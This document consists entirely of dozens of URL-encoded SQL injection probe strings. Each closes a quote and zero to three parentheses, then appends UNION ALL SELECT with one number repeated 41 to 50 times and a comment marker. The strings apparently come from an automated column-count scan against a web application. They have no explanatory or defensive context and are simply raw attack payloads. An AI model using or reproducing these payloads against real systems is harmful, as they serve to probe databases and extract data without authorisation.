-5623%22%29%29%29%20UNION%20ALL%20SELECT%207515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%23 -7544%22%29%29%29%20UNION%20ALL%20SELECT%205487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%2C5487%23 -6228%22%29%29%29%20UNION%20ALL%20SELECT%202865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%2C2865%23 -6283%22%29%29%29%20UNION%20ALL%20SELECT%205098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%2C5098%23 -3395%22%29%29%29%20UNION%20ALL%20SELECT%209974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%2C9974%23 -7598%22%29%29%29%20UNION%20ALL%20SELECT%204651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%2C4651%23 -9046%22%29%29%29%20UNION%20ALL%20SELECT%203960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%2C3960%23 -1475%22%29%29%29%20UNION%20ALL%20SELECT%206533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%23 -7610%22%20UNION%20ALL%20SELECT%201138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%2C1138%23 -7471%22%20UNION%20ALL%20SELECT%204906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%23 -9500%22%20UNION%20ALL%20SELECT%207113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%23 -1770%22%20UNION%20ALL%20SELECT%205601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%23 -1846%22%20UNION%20ALL%20SELECT%202214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%23 -2043%22%20UNION%20ALL%20SELECT%206254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%2C6254%23 -8895%22%20UNION%20ALL%20SELECT%203972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%23 -9253%22%20UNION%20ALL%20SELECT%202047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%23 -8566%22%20UNION%20ALL%20SELECT%201170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%2C1170%23 -1094%22%20UNION%20ALL%20SELECT%209709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%23 -3523%22%29%20UNION%20ALL%20SELECT%202742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%23 -5843%22%29%20UNION%20ALL%20SELECT%201652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%2C1652%23 -6720%22%29%20UNION%20ALL%20SELECT%205057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%23 -4494%22%29%20UNION%20ALL%20SELECT%209130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%2C9130%23 -4042%22%29%20UNION%20ALL%20SELECT%208764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%23 -5286%22%29%20UNION%20ALL%20SELECT%208464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%23 -2958%22%29%20UNION%20ALL%20SELECT%209830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%2C9830%23 -8625%22%29%20UNION%20ALL%20SELECT%201259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%2C1259%23 -9037%22%29%20UNION%20ALL%20SELECT%209465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%23 -7589%22%29%20UNION%20ALL%20SELECT%201084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%2C1084%23 -6929%22%29%29%20UNION%20ALL%20SELECT%201650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%2C1650%23 -9335%22%29%29%20UNION%20ALL%20SELECT%205418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%23 -5071%22%29%29%20UNION%20ALL%20SELECT%202171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%23 -5161%22%29%29%20UNION%20ALL%20SELECT%207876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%23 -8776%22%29%29%20UNION%20ALL%20SELECT%201826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%23 -5676%22%29%29%20UNION%20ALL%20SELECT%201708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%23 -2888%22%29%29%20UNION%20ALL%20SELECT%203407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%23 -4758%22%29%29%20UNION%20ALL%20SELECT%209534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%23 -6567%22%29%29%20UNION%20ALL%20SELECT%209720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%2C9720%23 -7940%22%29%29%20UNION%20ALL%20SELECT%203433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%2C3433%23 -7902%22%29%29%29%20UNION%20ALL%20SELECT%205560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%23 -8945%22%29%29%29%20UNION%20ALL%20SELECT%201923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%2C1923%23 -8267%22%29%29%29%20UNION%20ALL%20SELECT%207474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%23 -1331%22%29%29%29%20UNION%20ALL%20SELECT%203123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%2C3123%23 -6001%22%29%29%29%20UNION%20ALL%20SELECT%207452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%23 -2874%22%29%29%29%20UNION%20ALL%20SELECT%202678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%2C2678%23 -6118%22%29%29%29%20UNION%20ALL%20SELECT%206798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%2C6798%23 -6047%22%29%29%29%20UNION%20ALL%20SELECT%207999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%23 -4814%22%29%29%29%20UNION%20ALL%20SELECT%206596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%2C6596%23 -2374%22%29%29%29%20UNION%20ALL%20SELECT%207603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%23 -3279%22%20UNION%20ALL%20SELECT%202048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%2C2048%23 -4527%22%20UNION%20ALL%20SELECT%202416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%2C2416%23 -5422%22%20UNION%20ALL%20SELECT%205041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%2C5041%23 -8087%22%20UNION%20ALL%20SELECT%204880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%2C4880%23 -2858%22%20UNION%20ALL%20SELECT%204760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%23 -2140%22%20UNION%20ALL%20SELECT%201750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%23 -5087%22%20UNION%20ALL%20SELECT%203688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%2C3688%23 -2885%22%20UNION%20ALL%20SELECT%204513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%2C4513%23 -5450%22%20UNION%20ALL%20SELECT%204534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%23 -2469%22%20UNION%20ALL%20SELECT%208398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%2C8398%23 -2697%25%27%29%20UNION%20ALL%20SELECT%206879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%2C6879%23 